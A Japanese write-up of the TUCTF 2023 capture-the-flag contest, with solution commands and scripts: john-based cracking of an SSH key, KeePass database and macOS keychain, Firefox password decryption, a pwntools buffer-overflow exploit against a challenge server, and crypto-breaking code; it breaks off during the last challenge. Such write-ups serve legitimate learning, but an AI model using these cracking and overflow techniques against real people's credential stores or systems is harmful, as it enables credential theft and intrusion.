この大会は2023/12/2 2:00(JST)~2023/12/4 2:00(JST)に開催されました。
今回もチームで参戦。結果は3267点で764チーム中18位でした。
自分で解けた問題をWriteupとして書いておきます。
Discord (Intro/Welcome)
Discordに入り、#rules-and-infoチャネルのトピックを見ると、フラグが書いてあった。
TUCTF{yahahaha_y0u_f0und_m3}
A.R.K. 1 (Misc)
添付ファイルはssh秘密鍵でパスフレーズがかかっている。パスフレーズには"sheep"が含まれていることが問題文からわかるので、その範囲でクラックする。
$ cat /usr/share/wordlists/rockyou.txt | grep sheep > wordlist.txt $ ssh2john sheep > ssh.hash $ john --wordlist=wordlist.txt ssh.hash Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes Cost 2 (iteration count) is 16 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status baabaablacksheep (sheep) 1g 0:00:00:01 DONE (2023-12-02 11:29) 0.6329g/s 40.50p/s 40.50c/s 40.50C/s bluesheep..sheepp Use the "--show" option to display all of the cracked passwords reliably Session completed.
TUCTF{baabaablacksheep}
A.R.K. 2 (Misc)
$ file woof woof: Keepass password database 2.x KDBX $ cat /usr/share/wordlists/rockyou.txt | grep dog > wordlist.txt $ keepass2john woof > keepass.hash $ john --wordlist=wordlist.txt keepass.hash Using default input encoding: UTF-8 Loaded 1 password hash (KeePass [SHA256 AES 32/64]) Cost 1 (iteration count) is 60000 for all loaded hashes Cost 2 (version) is 2 for all loaded hashes Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status wholetthedogsout (woof) 1g 0:00:00:03 DONE (2023-12-02 11:38) 0.3086g/s 296.2p/s 296.2c/s 296.2C/s zippydog..the dog Use the "--show" option to display all of the cracked passwords reliably Session completed.
このパスワードを使って、KeePassでwoofファイルを開く。Recycle Binにflagというタイトルでパスワードが設定されていた。
パスワード:flag-waz-here 備考:blah blah blah
特にフラグは見つからない。履歴タブを見て、一番古いバージョンの情報を表示する。高度タブを見ると、realFlagの値にフラグが設定されていた。
TUCTF{K3eP_M4_Pa$s_rE4L_SaF3}
A.R.K. 3 (Misc)
$ file meow meow: Mac OS X Keychain File $ cat /usr/share/wordlists/rockyou.txt | grep meow > wordlist.txt $ keychain2john meow > keychain.hash $ john --wordlist=wordlist.txt keychain.hash Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Using default input encoding: UTF-8 Loaded 1 password hash (keychain, Mac OS X Keychain [PBKDF2-SHA1 3DES 256/256 AVX2 8x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status coolcatmeow (meow) 1g 0:00:00:00 DONE (2023-12-02 12:00) 14.28g/s 18385p/s 18385c/s 18385C/s leslie-meow..!#%&meow12345 Session completed.
https://github.com/n0fate/chainbreakerのツールを使って、ファイルを開く。このときパスワードに以下を指定する。
coolcatmeow
$ python -m chainbreaker -pa meow -o output Unlock Password: 2023-12-02 12:12:07,313 - INFO - Version - 3.0.3 2023-12-02 12:12:07,314 - INFO - Chainbreaker : https://github.com/n0fate/chainbreaker 2023-12-02 12:12:07,314 - INFO - Version: 3.0.3 2023-12-02 12:12:07,315 - INFO - Runtime Command: /usr/local/lib/python3.11/dist-packages/chainbreaker-3.0.3-py3.11.egg/chainbreaker/__main__.py -pa meow -o output 2023-12-02 12:12:07,315 - INFO - Keychain: meow 2023-12-02 12:12:07,315 - INFO - Keychain MD5: c0bbdc431e82ceb82c6c62ae4571a52a 2023-12-02 12:12:07,315 - INFO - Keychain 256: 0653458b0fc08b21b1cbd91c8434320edc0063efbaea221d0723c1e75df927b3 2023-12-02 12:12:07,315 - INFO - Dump Start: 2023-12-02 12:12:07.314647 2023-12-02 12:12:07,338 - WARNING - [!] Certificate Table is not available 2023-12-02 12:12:07,339 - INFO - 1 Keychain Password Hash 2023-12-02 12:12:07,339 - INFO - $keychain$*b'9196324d59f13ef6b20331e2e6d81da8993a02db'*b'34d065407b48d418'*b'976cb9617ec4e656d7fdbb097c525c9fc7502908aab1dc9aefbf40b24368ee8e78af756e91cc960a65d90f9be62e4240' 2023-12-02 12:12:07,339 - INFO - 2023-12-02 12:12:07,339 - INFO - 1 Generic Passwords 2023-12-02 12:12:07,340 - INFO - [+] Generic Password Record 2023-12-02 12:12:07,340 - INFO - [-] Create DateTime: 2023-11-27 22:43:23 2023-12-02 12:12:07,340 - INFO - [-] Last Modified DateTime: 2023-11-27 22:43:23 2023-12-02 12:12:07,341 - INFO - [-] Description: 2023-12-02 12:12:07,341 - INFO - [-] Creator: 2023-12-02 12:12:07,341 - INFO - [-] Type: 2023-12-02 12:12:07,341 - INFO - [-] Print Name: b'flag' 2023-12-02 12:12:07,342 - INFO - [-] Alias: 2023-12-02 12:12:07,342 - INFO - [-] Account: b'flag' 2023-12-02 12:12:07,342 - INFO - [-] Service: b'flag' 2023-12-02 12:12:07,342 - INFO - [-] Password: TUCTF{k3YCh41ns_AR3_sUp3r_c00L} 2023-12-02 12:12:07,342 - INFO - 2023-12-02 12:12:07,342 - INFO - 2023-12-02 12:12:07,342 - INFO - 0 Internet Passwords 2023-12-02 12:12:07,342 - INFO - 0 Appleshare Passwords 2023-12-02 12:12:07,343 - INFO - 0 Private Keys 2023-12-02 12:12:07,343 - INFO - 0 Public Keys 2023-12-02 12:12:07,343 - INFO - 0 x509 Certificates 2023-12-02 12:12:07,343 - INFO - Chainbreaker : https://github.com/n0fate/chainbreaker 2023-12-02 12:12:07,343 - INFO - Version: 3.0.3 2023-12-02 12:12:07,343 - INFO - Runtime Command: /usr/local/lib/python3.11/dist-packages/chainbreaker-3.0.3-py3.11.egg/chainbreaker/__main__.py -pa meow -o output 2023-12-02 12:12:07,343 - INFO - Keychain: meow 2023-12-02 12:12:07,343 - INFO - Keychain MD5: c0bbdc431e82ceb82c6c62ae4571a52a 2023-12-02 12:12:07,343 - INFO - Keychain 256: 0653458b0fc08b21b1cbd91c8434320edc0063efbaea221d0723c1e75df927b3 2023-12-02 12:12:07,343 - INFO - Dump Start: 2023-12-02 12:12:07.314647 2023-12-02 12:12:07,343 - INFO - 1 Keychain Password Hash 2023-12-02 12:12:07,344 - INFO - 1 Generic Passwords 2023-12-02 12:12:07,344 - INFO - 0 Internet Passwords 2023-12-02 12:12:07,344 - INFO - 0 Appleshare Passwords 2023-12-02 12:12:07,344 - INFO - 0 Private Keys 2023-12-02 12:12:07,344 - INFO - 0 Public Keys 2023-12-02 12:12:07,344 - INFO - 0 x509 Certificates 2023-12-02 12:12:07,344 - INFO - Dump End: 2023-12-02 12:12:07.343304
TUCTF{k3YCh41ns_AR3_sUp3r_c00L}
A.R.K. 4 (Misc)
$ file fox fox: Zip archive data, at least v1.0 to extract, compression method=store
unzipしてfoxディレクトリに展開して、以下を実行する。
$ python firepwd.py -d fox globalSalt: b'2fc652a7ce01e8e33e32305be27942bc9a4b5707' SEQUENCE { SEQUENCE { OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2 SEQUENCE { SEQUENCE { OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2 SEQUENCE { OCTETSTRING b'8801df68ef2dc63819abeccfa48f18087a1ec29dbe37b94338690eacdf1b08ec' INTEGER b'01' INTEGER b'20' SEQUENCE { OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256 } } } SEQUENCE { OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC OCTETSTRING b'ee5b8b61626485e1c953dc612deb' } } } OCTETSTRING b'9c4ea18bdaa31238d08a5bbdc8a5b2e9' } clearText b'70617373776f72642d636865636b0202' password check? True SEQUENCE { SEQUENCE { OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2 SEQUENCE { SEQUENCE { OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2 SEQUENCE { OCTETSTRING b'b4f5dfad6b6f3a55681de13a603d6770877b976d22781aeab74223e0c3868f01' INTEGER b'01' INTEGER b'20' SEQUENCE { OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256 } } } SEQUENCE { OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC OCTETSTRING b'54540da34420dbd2de53b1dac951' } } } OCTETSTRING b'4b7e09bce487b8b3f05dece6a269dc20a95248de9f1eb3c68a26de9bfeb2dd3a' } clearText b'15a2911c5807e66419f40ddf517a576d6d407643e0f20ecb0808080808080808' decrypting login/password pairs https://www.example.com:b'fox',b'TUCTF{B3w4R3_7h3_f1r3_4nd_7h3_f0x}'
TUCTF{B3w4R3_7h3_f1r3_4nd_7h3_f0x}
Hacker Typer (Programming)
出力される文字列を入力することを繰り返す。
#!/usr/bin/env python3 import requests import re url = 'https://hacker-typer.tuctf.com/' pattern = 'word-title">(.*)</strong' s = requests.Session() r = s.get(url) m = re.search(pattern, r.text) word = m.group(1) payload = {"word": word} r = s.post(url + 'check_word', data=payload) text = eval(r.text) print(text) word = text['next_word'] for i in range(150): payload = {"word": word} r = s.post(url + 'check_word', data=payload) text = eval(r.text) print('**** %03d ****' % (i + 1)) print(text) word = text['next_word']
実行結果は以下の通り。
: **** 146 **** {'next_word': 'ransomware', 'streak': 147, 'typing_speed': 0.11716461181640625} **** 147 **** {'next_word': 'cybercrime', 'streak': 148, 'typing_speed': 0.11814212799072266} **** 148 **** {'next_word': 'app', 'streak': 149, 'typing_speed': 0.11812734603881836} **** 149 **** {'next_word': 'cybercrime', 'streak': 150, 'typing_speed': 0.12377786636352539} **** 150 **** {'next_word': ' ', 'status': "You're fast! TUCTF{SuP3R_Typ3R}", 'typing_speed': 0}
TUCTF{SuP3R_Typ3R}
Plenty O Fish in the Sea (Programming)
先頭が"A", "B", "I", "U"以外から始まる文字列を抽出し、URLデコードする。
#!/usr/bin/env python3 import urllib.parse with open('lost_map.log', 'r') as f: lines = f.read().splitlines() flag = '' for line in lines: if line[0] not in 'ABIU': flag += line flag = urllib.parse.unquote(flag) print(flag)
TUCTF{83h!Nd_7h3_W@73rF@11}
Hidden Value (Pwn)
Ghidraでデコンパイルする。
undefined8 main(void) { char local_78 [112]; setvbuf(stdin,(char *)0x0,2,0); setvbuf(stdout,(char *)0x0,2,0); printf("Enter your name: "); fgets(local_78,100,stdin); greet_user(local_78); return 0; } void greet_user(char *param_1) { char local_38 [44]; int local_c; local_c = 0x12345678; strcpy(local_38,param_1); if (local_c == -0x21524111) { hidden_command(); } else { printf("Hello, %s! Nothing special happened.\n",local_38); } return; } void hidden_command(void) { char local_78 [104]; FILE *local_10; puts("Congratulations! You have executed the hidden command."); local_10 = fopen("flag","r"); fgets(local_78,100,local_10); printf("The flag is: %s\n",local_78); return; }
BOFで任意の44バイトの後に-0x21524111(=0xdeadbeef)を指定して上書きすればよい。
#!/usr/bin/env python3 from pwn import * if len(sys.argv) == 1: p = remote('chal.tuctf.com', 30011) else: p = process('./hidden-value') payload = b'A' * 44 payload += p64(0xdeadbeef) data = p.recvuntil(b': ') print(data, end='') print(payload) p.sendline(payload) data = p.recvline().decode() print(data) data = p.recvrepeat(1).decode() print(data)
実行結果は以下の通り。
[+] Opening connection to chal.tuctf.com on port 30011: Done b'Enter your name: 'b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xef\xbe\xad\xde\x00\x00\x00\x00' Congratulations! You have executed the hidden command. The flag is: TUCTF{pr4cti4l_buffer_overrun} [*] Closed connection to chal.tuctf.com port 30011
TUCTF{pr4cti4l_buffer_overrun}
What Are You Doing In My Swamp? (Forensics)
JPGのヘッダ3バイトが壊れているので、修復する。
00 00 00 -> FF D8 FF
修復した画像には特にフラグに関することは書かれていない。
$ stegseek layers_fix.jpg dict/rockyou.txt StegSeek 0.6 - https://github.com/RickdeJager/StegSeek Premature end of JPEG file [i] Found passphrase: "layers" [i] Original filename: "secret_message.txt". [i] Extracting to "layers_fix.jpg.out". $ cat layers_fix.jpg.out GFXGU{LtIvh_zIv_oRpv_lmrOmh} ###################################################################################### # # # ,.--------._ # # / ''. # # ,' \ |"\ /\ /\ # # /"| / \ |__" ( \\ // ) # # "_"| / z#####z \ // \ \\ // / # # \\ ##### ##------". \// \_\\||||//_/ # # \\/-----\ / ". \ \/ _ _ \ # # \| \ | ,,--.. \ \/|(O)(O)| # # | ,.--._ \ ( | ## \) \ \/ | | # # |( ## )/ \ `-....-// |///////////////_\/ \ / # # '--'." \ \ // |____| # # /' / ) --. \ || / \ # # ,..| \.________/ `-.. \ \ \| \ 0 0 / # # _,##/ | ,/ / \ \ \ \ U / \_//_/ # # :###.- | ,/ / \ /' ""\ .\ ( / # # /####| | (.___________,---',/ | |\=._____| |_/ # # /#####| | \__|__|__|__|_,/ |####\ | || # # /######\ \ \__________/ /#####| \ || # # /|#######`. `\ /#######\ | || # # /++\#########\ \ _,' _/#########\ | || # # /++++|#########| \ .---.. ,/ ,'##########.\|_|| Donkey By # # //++++|#########\. \. ,-/ ,'########,+++++\\_\\ Hard'96 # # /++++++|##########\. '._ _,/ ,'######,''++++++++\ # # |+++++++|###########| -----." _'#######' +++++++++++\ # # |+++++++|############\. \\ // /#######/++++ S@yaN +++\ # # ________________________\\___//______________________________________ # # / ____________________________________________________________________) # # / / _ _ # # | | | | | | # # \ \ | | _ ____ ____ | | _ # # \ \ | || \ / ___) / _ ) | | / ) # # _____) ) | | | | | | ( __ / | |< ( # # (______/ |_| |_| |_| \_____) |_| \_) # # 19.08.02 # ######################################################################################
Atbash暗号。https://www.dcode.fr/atbash-cipherで復号する。
TUCTF{OgRes_aRe_lIke_oniLns}
Table Encryption (Cryptography)
平文が「
#!/usr/bin/env python3 with open('table_encryption.xml.enc', 'rb') as f: ct = f.read() xml = b'<?xml version="1.0" ' key = b'' for i in range(len(xml)): k = ct[i] ^ xml[i] key += bytes([k]) assert key[:4] == key[16:] key = key[:16] pt = b'' for i in range(len(ct)): pt += bytes([ct[i] ^ key[i % len(key)]]) pt = pt.decode() print(pt)
復号結果は以下の通り。
<?xml version="1.0" encoding="UTF-8"?> <root> <table name="users"> <column name="id" type="int" /> <column name="name" type="varchar" /> <column name="email" type="varchar" /> <column name="password" type="varchar" /> </table> <table name="posts"> <column name="id" type="int" /> <column name="user_id" type="int" /> <column name="title" type="varchar" /> <column name="content" type="varchar" /> </table> <table name="comments"> <column name="id" type="int" /> <column name="post_id" type="int" /> <column name="user_id" type="int" /> <column name="content" type="varchar" /> </table> <users> <user> <id>1</id> <name>John Doe</name> <email>john@tuctf.com</email> <password>TUCTF{x0r_t4bl3s_R_fun!!!11!}</password> </user> </users> </root>
TUCTF{x0r_t4bl3s_R_fun!!!11!}
Keyboard Cipher (Cryptography)
CyberChefで以下の順で復号する。
・From Hex ・From Base64
復号結果は以下の通り。
r5yG Ji7y XdV r5yG DrGv 0oL xDwA gY5R ZsC gYjN ZsQ jIlM aWdX kOp 1wA KoP YgJn
キーボードのキーの配置で、囲まれている文字を並べる。例えばr5yGは"T"となる。
TUCTFpstxhakslqlh
TUCTF{pstxhakslqlh}
Custom ECB Cipher (Cryptography)
1ブロック4バイトごとに暗号化している。xがわからないので、最初の4バイトのみを対象に暗号文になるものをブルートフォースで見つける。その後、ブロックごとに平文のブルートフォースで復号する。
#!/usr/bin/env python3 from Crypto.Util.number import * import itertools def convert(msg, x): msg = msg ^ msg >> x msg = msg ^ msg << 13 & 275128763 msg = msg ^ msg << 20 & 2186268085 msg = msg ^ msg >> 14 return msg c = 'e34a707c5c1970cc6375181577612a4ed07a2c3e3f441d6af808a8acd4310b89bd7e2bb9' c = bytes.fromhex(c) chars = '' for i in range(33, 127): chars += chr(i) flag = '' found = False c_block = c[:4] for x in range(32): for t in itertools.product(chars, repeat=4): text = ''.join(t) block = bytes_to_long(text.encode()) block = convert(block, x) block = long_to_bytes(block, 4) if block == c_block: flag += text found = True break if found: break for i in range(4, len(c), 4): c_block = c[i:i+4] for t in itertools.product(chars, repeat=4): text = ''.join(t) block = bytes_to_long(text.encode()) block = convert(block, x) block = long_to_bytes(block, 4) if block == c_block: flag += text break flag = 'TUCTF{%s}' % flag print(flag)
TUCTF{sRta^s90s-#VgsnzPsta-TjLx7s8Txgs-*Ko}
Simple Cipher (Cryptography)
サーバの処理概要は以下の通り。
・以下繰り返し ・inp: 入力 ・inpが"1"または"Encrypt a message with a custom key"の場合、encrypt()を実行 ・pt: 入力 ・key: 入力(16進数文字列で12バイトの長さ) ・binKey: '1' + keyの16進数を2進数に変換し、最初の1バイトを除いた文字列 ・binPT = '' ・ptの各文字chrについて以下を実行 ・chrのASCIIコードを2進数にしてbinPTに連結 ・binCText = '' ・binPT: 長さが48バイトの倍数になるよう"0"をパディング ・binPTを48バイトごとに以下を実行 ・binCTextにsubstitution(binPT[i:i+48])とbinKeyのXORを連結 ・binCTextを表示 ・inpが"2"または"Decrypt a message"の場合、decrypt()を実行 ・inpが"3"または"Get the flag"の場合、getFlag()を実行 ・inpが"4"または"Exit"の場合、終了
PTを48ビットのうち1ビットのみを"1"にして、48回パターン暗号化を実行すれば、substitutionのpatternを割り出せる。あとはフラグが"TUCTF{"から始まることを前提にフラグを暗号化したときのKeyを割り出し、復号する。
#!/usr/bin/env python3 import socket def recvuntil(s, tail): data = b'' while True: if tail in data: return data.decode() data += s.recv(1) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('chal.tuctf.com', 30004)) binKey = '0' * 48 key = hex(int(binKey, 2))[2:].zfill(12) pattern = [-1] * 48 for i in range(48): binPT = '0' * i + '1' + '0' * (47 - i) pt = ''.join([chr(int(binPT[i:i+8], 2)) for i in range(0, len(binPT), 8)]) data = recvuntil(s, b't\n').rstrip() print(data) data = recvuntil(s, b'\n').rstrip() print(data) print('1') s.sendall(b'1\n') data = recvuntil(s, b': ') print(data + pt) s.sendall(pt.encode() + b'\n') data = recvuntil(s, b': ') print(data + key) s.sendall(key.encode() + b'\n') for _ in range(3): data = recvuntil(s, b'\n').rstrip() print(data) index = list(data).index('1') pattern[index] = i data = recvuntil(s, b'\n').rstrip() print(data) pattern = [41, 18, 30, 26, 15, 11, 14, 25, 40, 0, 47, 12, 28, 21, 32, 29, 20, 8, 19, 9, 22, 42, 36, 7, 10, 3, 31, 2, 5, 17, 13, 43, 27, 44, 6, 38, 24, 33, 23, 45, 1, 16, 4, 35, 34, 46, 39, 37] ct = '110010100001000100101101001010111110010111001011100100100001010110111111111010001110011111011101101100000001100100001001111111110101010011110011000100000011000010000100111100011001010111010111101111100011010110100110100010010000011111100001100100100001100110100100100100110111001001010101' flag_head = 'TUCTF{' bin_flag_head = ''.join(['{0:08b}'.format(ord(chr)) for chr in flag_head]) scrambled = '' for i in pattern: scrambled += str(bin_flag_head[i]) binKey = '' for i in range(48): binKey += str(int(scrambled[i]) ^ int(ct[i])) key = hex(int(binKey, 2))[2:].zfill(12) data = recvuntil(s, b't\n').rstrip() print(data) data = recvuntil(s, b'\n').rstrip() print(data) print('2') s.sendall(b'2\n') data = recvuntil(s, b': ') print(data + ct) s.sendall(ct.encode() + b'\n') data = recvuntil(s, b': ') print(data + key) s.sendall(key.encode() + b'\n') for _ in range(4): data = recvuntil(s, b'\n').rstrip() print(data)
実行結果は以下の通り。
Please Select Your Mode [1] Encrypt a message with a custom key [2] Decrypt a message [3] Get the flag [4] Exit 1 Enter your plaintext: € Enter your 6 byte key (ex. 0011AABBCCDD): 000000000000 Your ciphertext is: 000000000100000000000000000000000000000000000000 Please Select Your Mode [1] Encrypt a message with a custom key [2] Decrypt a message [3] Get the flag [4] Exit 1 Enter your plaintext: @ Enter your 6 byte key (ex. 0011AABBCCDD): 000000000000 Your ciphertext is: 000000000000000000000000000000000000000010000000 Please Select Your Mode [1] Encrypt a message with a custom key [2] Decrypt a message [3] Get the flag [4] Exit 1 Enter your plaintext: Enter your 6 byte key (ex. 0011AABBCCDD): 000000000000 Your ciphertext is: 000000000000000000000000000100000000000000000000 : : Please Select Your Mode [1] Encrypt a message with a custom key [2] Decrypt a message [3] Get the flag [4] Exit 1 Enter your plaintext: Enter your 6 byte key (ex. 0011AABBCCDD): 000000000000 Your ciphertext is: 000000000000000000000000000000000000000100000000 Please Select Your Mode [1] Encrypt a message with a custom key [2] Decrypt a message [3] Get the flag [4] Exit 1 Enter your plaintext: Enter your 6 byte key (ex. 0011AABBCCDD): 000000000000 Your ciphertext is: 000000000000000000000000000000000000000000000100 Please Select Your Mode [1] Encrypt a message with a custom key [2] Decrypt a message [3] Get the flag [4] Exit 1 Enter your plaintext: Enter your 6 byte key (ex. 0011AABBCCDD): 000000000000 Your ciphertext is: 000000000010000000000000000000000000000000000000 Please Select Your Mode [1] Encrypt a message with a custom key [2] Decrypt a message [3] Get the flag [4] Exit 2 Enter your ciphertext as binary (ex. 0011001101010101000011110000000011111111): 110010100001000100101101001010111110010111001011100100100001010110111111111010001110011111011101101100000001100100001001111111110101010011110011000100000011000010000100111100011001010111010111101111100011010110100110100010010000011111100001100100100001100110100100100100110111001001010101 Enter your 6 byte key (ex. 0011FFDDCCBB): 47303164334e Here is your plaintext back: TUCTF{D0nt_inv3nt_crypt0_algor1thm5}
TUCTF{D0nt_inv3nt_crypt0_algor1thm5}
Never Ending Crypto: Taylor's Version (Cryptography)
レベル0~7を解く必要があるようだ。
■レベル0
$ nc chal.tuctf.com 30007 Welcome to Never Ending Crypto (Taylor's Version). Hope you're ready for the new and improved version of this annual challenge. You can complete these levels in any order, but I recommend you do 6 and 7 last, as they build on previous levels. 0: Shake It Off Incomplete 1: Mirrorball Incomplete 2: Nothing New Incomplete 3: Change Incomplete 4: Ivy Incomplete 5: False God Incomplete 6: Hits Different Incomplete 7: End Game Incomplete What level? 0 Level 0: Shake It Off Haters gonna hate Give me text: abcd ABCD encrypted is TaylorTaylorTaylorTaylorTaylor TaylorTaylorTaylorTaylorSwift TaylorTaylorTaylorSwiftTaylor TaylorTaylorTaylorSwiftSwift Decrypt TaylorTaylorSwiftSwiftSwift SwiftSwiftTaylorTaylorTaylor TaylorTaylorTaylorTaylorTaylor TaylorSwiftTaylorSwiftSwift TaylorSwiftTaylorTaylorTaylor TaylorSwiftSwiftTaylorSwift TaylorTaylorSwiftTaylorTaylor
What level? 0
Level 0: Shake It Off
Haters gonna hate
Give me text:
aAaA
AAAA encrypted is TaylorTaylorTaylorTaylorTaylor TaylorTaylorTaylorTaylorTaylor TaylorTaylorTaylorTaylorTaylor TaylorTaylorTaylorTaylorTaylor
Decrypt TaylorSwiftSwiftTaylorTaylor TaylorSwiftSwiftSwiftTaylor TaylorTaylorTaylorSwiftSwift SwiftTaylorSwiftTaylorTaylor TaylorSwiftTaylorSwiftSwift SwiftTaylorSwiftTaylorTaylor SwiftTaylorTaylorSwiftTaylor
アルファベット大文字だけで、Taylorが0、Swiftが1としてインデックスを表していると推測する。
■レベル1 Level 1: Mirrorball Give me text: ABCD ABCD encrypted is SwiftSwiftSwiftSwiftSwift SwiftSwiftSwiftSwiftTaylor SwiftSwiftSwiftTaylorSwift SwiftSwiftSwiftTaylorTaylor
今度はレベル0と逆で、Taylorが1、Swiftが0としてデコードする。
■レベル2 Level 2: Nothing New Give me text: ABCD ABCD encrypted is TaylorSwiftSwiftTaylorSwift TaylorSwiftSwiftSwiftTaylor TaylorSwiftSwiftSwiftSwift SwiftTaylorTaylorTaylorTaylor Give me text: ZYXW ZYXW encrypted is TaylorSwiftSwiftTaylorTaylor TaylorSwiftTaylorSwiftSwift TaylorSwiftTaylorSwiftTaylor TaylorSwiftTaylorTaylorSwift
レベル0の復号をした後、ROT13をする。
■レベル3 Level 3: Change Give me text: ZYXW ZYXW encrypted is TaylorTaylorTaylorTaylorTaylor TaylorTaylorTaylorTaylorSwift TaylorTaylorTaylorSwiftTaylor TaylorTaylorTaylorSwiftSwift
レベル0の復号をした後、Atbash暗号の復号をする。
■レベル4 Level 4: Ivy Give me text: ZYXW ZYXW encrypted is SwiftSwiftTaylorTaylorSwift SwiftSwiftTaylorTaylorTaylor SwiftTaylorSwiftSwiftTaylor SwiftTaylorSwiftSwiftSwift Give me text: ABCDEFGHIJKLM ABCDEFGHIJKLM encrypted is TaylorTaylorTaylorTaylorTaylor TaylorTaylorSwiftTaylorTaylor TaylorSwiftTaylorTaylorTaylor TaylorSwiftSwiftTaylorTaylor TaylorTaylorTaylorTaylorSwift TaylorTaylorTaylorSwiftSwift TaylorTaylorSwiftTaylorSwift TaylorTaylorSwiftSwiftSwift TaylorSwiftTaylorTaylorSwift TaylorSwiftTaylorSwiftSwift TaylorTaylorTaylorSwiftTaylor TaylorTaylorSwiftSwiftTaylor TaylorSwiftTaylorSwiftTaylor Give me text: ABCDEFGHIJKLMNOPQRSTUVWXYZ ABCDEFGHIJKLMNOPQRSTUVWXYZ encrypted is TaylorTaylorTaylorTaylorTaylor TaylorTaylorSwiftTaylorTaylor TaylorSwiftTaylorTaylorTaylor TaylorSwiftSwiftTaylorTaylor SwiftTaylorTaylorTaylorTaylor SwiftTaylorSwiftTaylorTaylor SwiftSwiftTaylorTaylorTaylor TaylorTaylorTaylorTaylorSwift TaylorTaylorTaylorSwiftSwift TaylorTaylorSwiftTaylorSwift TaylorTaylorSwiftSwiftSwift TaylorSwiftTaylorTaylorSwift TaylorSwiftTaylorSwiftSwift TaylorSwiftSwiftTaylorSwift TaylorSwiftSwiftSwiftSwift SwiftTaylorTaylorTaylorSwift SwiftTaylorTaylorSwiftSwift SwiftTaylorSwiftTaylorSwift SwiftTaylorSwiftSwiftSwift SwiftSwiftTaylorTaylorSwift TaylorTaylorTaylorSwiftTaylor TaylorTaylorSwiftSwiftTaylor TaylorSwiftTaylorSwiftTaylor TaylorSwiftSwiftSwiftTaylor SwiftTaylorTaylorSwiftTaylor SwiftTaylorSwiftSwiftTaylor
ZYXWについて、レベル0の復号のみ行い、数値にしてみる。
25, 24, 22, 23
ABCDEFGHIJKLMについて、レベル0の復号のみ行い、数値にしてみる。
0, 4, 8, 12, 1, 3, 5, 7, 9, 11, 2, 6, 10
ABCDEFGHIJKLMNOPQRSTUVWXYZについて、レベル0の復号のみ行い、数値にしてみる。
0, 4, 8, 12, 16, 20, 24, 1, 3, 5, 7, 9, 11, 13, 15, 17, 19, 21, 23, 25, 2, 6, 10, 14, 18, 22
Give me text: ABCDE ABCDE encrypted is TaylorTaylorTaylorTaylorTaylor TaylorTaylorSwiftTaylorTaylor TaylorTaylorTaylorTaylorSwift TaylorTaylorTaylorSwiftSwift TaylorTaylorTaylorSwiftTaylor
レベル0の復号のみ行い、数値にしてみる。
0, 4, 1, 3, 2
順序を入れ替えていると推測できる。その順序の法則は以下の通り。平文から暗号文にするときに以下の順序となる。
4の倍数のインデックスを並べる。次に奇数のインデックスを並べる。最後に4で割って2余るインデックスを並べる。
これを逆に戻せばよい。
■レベル5 Level 5: False God Give me text: ABCD ABCD encrypted is SwiftTaylorTaylorSwiftSwift TaylorTaylorTaylorTaylorTaylor SwiftSwiftTaylorTaylorTaylor TaylorSwiftTaylorSwiftSwift
レベル0の復号のみ行い、数値にしてみる。
19, 0, 24, 11
Give me text: ABCDEFGH ABCDEFGH encrypted is SwiftTaylorTaylorSwiftSwift TaylorTaylorTaylorTaylorTaylor SwiftSwiftTaylorTaylorTaylor TaylorSwiftTaylorSwiftSwift TaylorSwiftSwiftSwiftTaylor SwiftTaylorTaylorTaylorSwift SwiftTaylorTaylorSwiftTaylor SwiftTaylorSwiftSwiftTaylor
レベル0の復号のみ行い、数値にしてみる。
19, 0, 24, 11, 14, 17, 18, 22
Give me text: AB AB encrypted is SwiftTaylorTaylorSwiftSwift TaylorTaylorTaylorTaylorTaylor
レベル0の復号のみ行い、数値にしてみる。
19, 0
Give me text: DCBA DCBA encrypted is TaylorSwiftTaylorSwiftSwift SwiftSwiftTaylorTaylorTaylor TaylorTaylorTaylorTaylorTaylor SwiftTaylorTaylorSwiftSwift
レベル0の復号のみ行い、数値にしてみる。
11, 24, 0, 19
長さとかは関係なく、対応する文字は決まっているので、対応表を作り、換字式暗号として復号する。
■レベル6 Level 6: Hits Different Give me text: ABCD ABCD encrypted is TaylorSwiftSwiftTaylorSwift TaylorSwiftTaylorTaylorSwift SwiftTaylorSwiftSwiftSwift SwiftSwiftTaylorSwiftTaylor
レベル0の復号のみ行い、数値にしてみる。
13, 9, 23, 26
Give me text: ABCDEFGH ABCDEFGH encrypted is TaylorSwiftSwiftTaylorSwift TaylorSwiftTaylorTaylorSwift SwiftTaylorSwiftSwiftSwift SwiftSwiftTaylorSwiftTaylor TaylorSwiftSwiftTaylorTaylor SwiftSwiftSwiftSwiftSwift TaylorTaylorSwiftSwiftSwift SwiftTaylorSwiftTaylorTaylor
レベル0の復号のみ行い、数値にしてみる。
13, 9, 23, 26, 12, 31, 7, 20
Give me text: DCBA DCBA encrypted is SwiftSwiftTaylorSwiftTaylor SwiftTaylorSwiftSwiftSwift TaylorSwiftTaylorTaylorSwift TaylorSwiftSwiftTaylorSwift
レベル0の復号のみ行い、数値にしてみる。
26, 23, 9, 13
レベル5と同じように復号する。
■レベル7 Level 7: End Game Give me text: ABCD ABCD encrypted is SwiftTaylorSwiftSwiftTaylor SwiftTaylorSwiftSwiftSwift SwiftSwiftTaylorTaylorTaylor SwiftSwiftTaylorTaylorSwift
レベル0の復号のみ行い、数値にしてみる。
22, 23, 24, 25
